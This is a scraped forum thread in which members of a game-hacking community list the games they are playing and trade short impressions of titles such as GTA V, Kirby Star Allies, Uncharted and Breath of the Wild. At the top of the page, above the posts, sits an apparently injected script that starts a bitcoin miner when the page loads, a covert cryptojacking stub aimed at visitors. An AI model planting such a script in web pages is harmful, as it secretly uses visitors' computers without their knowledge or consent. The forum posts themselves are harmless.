<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
SAJewers
hi

Re: What games are you playing?

Postby SAJewers » 4 months ago

Picked up The Disappearing of Gensokyo over the weekend during the Lunar Sale.

Having fun, but man, is it difficult.
ImageImageImageImage
ImageImageImageImage

Bean

Postby Bean » 3 months ago

Finished up the last bit of Poi: Explorer Edition on the Switch today. It was a mostly enjoyable, solid platformer with a couple of sticking points in the fourth and final world that took it down a little bit. Still, yeah. I give it a casual recommendation if you absolutely need to a 3D platformer to play with Odyssey out of the way.

Will I ever play Zelda or Gunvolt 2? Who knows? I don't.

Snakebite969
Snek
Pronouns: he/him/his

Postby Snakebite969 » 3 months ago

Was trying the new balloon mode on super Mario Odyssey

It's fun, but if you're doing it in cascade kingdom, EVERYONE goes for the little area underneath the starting point

Also the OOB glitches probably work for balloon mode because there were also some balloons that appeared to be stuck 9m inside walls
Poppo wrote:Poppo! Poppo! *clickety-clank* Po! Po! Po! *clickety-clank* Po? Po... Po... Po... Pogyaaaah!!
ImageImage

BuzzNBen
First name: Ben

Postby BuzzNBen » 3 months ago

Snakebite969 wrote: Was trying the new balloon mode on super Mario Odyssey

It's fun, but if you're doing it in cascade kingdom, EVERYONE goes for the little area underneath the starting point

Also the OOB glitches probably work for balloon mode because there were also some balloons that appeared to be stuck 9m inside walls
Same. I find the new balloon mode super fun and entertaining. However, I think Nintendo false advertised it... Like, it feels less like a "hide and seek" game and more like speed running , which is actually great.

Bean

My brother was kind enough to let me borrow his PS4, so I'm playing Uncharted: The Lost Legacy and GTA V right now.

BurntTenda
defeat four ducks

Postby BurntTenda » 3 months ago

Bean wrote: My brother was kind enough to let me borrow his PS4, so I'm playing Uncharted: The Lost Legacy and GTA V right now.
How is The Lost Legacy so far?
I've been wondering if I should get it.
Something goes here sometime.

Bean

BurntTenda wrote: How is The Lost Legacy so far?
I've been wondering if I should get it.
Now I haven't played Uncharted 4 yet, but TLL's pretty fun. Chapter 4 (I think there are 9 in total) is this more wide open area with many sub-locations to explore and stuff to find. Don't know how you'd find it all without a guide, but yeah, it was pretty neat. The rest of the game has been the standard story, platformy, and shooty stuff the series is known for. I'm enjoying it more than UC3 at the very least.

SAJewers
hi

Postby SAJewers » 3 months ago

SAJewers wrote: Picked up The Disappearing of Gensokyo over the weekend during the Lunar Sale.

Having fun, but man, is it difficult.
...and done. Was, fun, albeit not easy (obviously :P)

Might try NG+ after this.
ImageImageImageImage
ImageImageImageImage

Alice
💙
Pronouns: Girl person

Postby Alice » 3 months ago

I've been playing Cyberdimension Neptunia: 4 Goddesses Online. It's pretty interesting but has some really annoying design decisions. Most notably ranged attacks are garbage. I've been primarily playing as Nepgear who's a mage. Her attacks have a range about 5x her height or so which is actually incredibly short. But on top of that there's another issue with ranged attacks. Until their corpses disappear, which takes way more time than necessary since they complete their current action before dying to begin with (another stupid as hell design decision, nothing like killing an enemy then taking a bunch of damage because it's now effectively invincible until the end of its action), they are completely solid and have hitboxes a lot bigger than they look like they should. So if you have a group of enemies in one spot, you'll keep attacking and hitting the same one until it's dead and its corpse disappears. A minor annoyance in wide open spaces but if you're in a cramped narrow corridor this can easily result in you being unable to actually harm enemies for ~10 seconds after killing one.

Past those issues though it's interesting, if a little on the easy side. (I've put almost no effort into defense, with Nepgear being a mage equipped with a gem that gives +50% or +75% int and -25% or 50% def yet I almost always stand in one place and tank bosses despite providing at leats 50% of the damage of my entire party and thus always getting the boss' focus.) I was expecting it to play worse in the conversion from turn-based rpg like the Re;Birth games to an action rpg.

Bean

The cool thing about replaying GTA V is that I don't need to pay attention to the cutscenes and their sophomoric writing. The gameplay's still great. I really enjoy this map a lot.

Bean

Got done with most of the side goals about 1/3 of the way through GTA V. The Knife Flights were way easier this time around since I understood how to keep the plane stable. It's almost time to go flying through the story now.

BurntTenda
defeat four ducks

I finished Ven's part of the story in Birth by Sleep.
The last part of the final boss was a little confusing.
I also started Aqua's story. She feels pretty fun to play so far.

AuraLancer

Postby AuraLancer » 3 months ago

I've been playing Monster Hunter World since it released. Nothing else.

Bean

Should finish GTA V's main story by the end of the week at the pace I'm on. 83% now.

The Hero Hartmut
First name: Garreth

Postby The Hero Hartmut » 3 months ago

Currently going through Master Mode of Breath of the Wild. I've managed to beat the Middle Trials of the Trial of the Sword so far, and I genuinely don't understand how there are people who are capable of doing the same but without taking damage. The Final Trials shouldn't be as hard, since they largely revolved around environment hazards rather than strong enemies, but, well, I guess I'll see how much I remember when I get to that.

Bean

And 100% in GTA V again. It's not too bad to do in this one compared to other games. Even went through and did all the single player goals this time around. No online for the PS4 right now, so I think I'm done with that. Back to Uncharted and video editing, I suppose!

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt

Postby Slimeman01 » 3 months ago

I got Kirby Star Allies today, and man is this game so much fun! I played it with 3 friends and we all had a blast. The friend system is unique, the levels are fun, and the abilities (Combined and new) are all so much fun to use!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

BurntTenda
defeat four ducks

I finished Aqua's story and the final episode.
Not sure if I want to try to beat the secret bosses or not.

Bean

I quickly went through Super Mario Advance (SMB2 remake) to unlock the extra mode. I think I'm going to record that soon and do a quick series on it, but man, this game feels way more floaty than the NES or All-Stars game. The smaller screen hurts it a bit, too, since that means less room to see during climbing segments and more camera scrolls that can put you in harm's way.

Bean

On second thought, the caption for this should've been Bandana Waddle Dee. Kirby Star Allies on the Switch, by the way.

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt

Postby Slimeman01 » 3 months ago

I had recently beaten Kirby Star Allies, and I really enjoyed my main playthrough! I thought the the entire game was an extremely fun experience, definitely worth it. Now, time to 100% it!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

AuraLancer

Postby AuraLancer » 3 months ago

Bean wrote: I quickly went through Super Mario Advance (SMB2 remake) to unlock the extra mode. I think I'm going to record that soon and do a quick series on it, but man, this game feels way more floaty than the NES or All-Stars game. The smaller screen hurts it a bit, too, since that means less room to see during climbing segments and more camera scrolls that can put you in harm's way.
Oh man, I went back to check this out sometime last year and I don't even know how I got 100% on it way back when I first played it. It feels so awful.

hardcore_crispy
Storm every temple, claim god as yourself.

Postby hardcore_crispy » 3 months ago

Just hit World Five in Celeste, wrapping up Champion's Ballad in BOTW, and thinking about starting the Ratchet and Clank remaster since it was free on PS Plus.
https://www.youtube.com/user/CrispyMWHC -- I play the games for the internet.
Currently playing: Celeste (B-Sides) / This Hack Needs A Name

BurntTenda
defeat four ducks

I beat Sephiroth in KH2FM.
It was easier than expected.
I thought the move that reduces your health to 1 would be way harder to interrupt.

I also beat Data Saix and Data Marluxia.

Data Axel is still destroying my everything.

Ffydwyrr
W-what in the world?!
Pronouns: he/his/him

Postby Ffydwyrr » 3 months ago

Taking a break from games for now, so I can pay more attention to my own RPG development project.

My favorite games I played for the first time last year were, in no particular order:

Dragon Quest Builders (PS Vita)
Disgaea 4: A Promise Revisited (PS Vita)
Bravely Default (3DS)
Bravely Second: End Layer (3DS)

Games I replayed recently include Final Fantasy (the first one), Final Fantasy 12, Dragon Quest 8: Journey of the Cursed King, Earthbound, and The 7th Saga. Did I mention I love RPGs?

Return to “the cartridgé”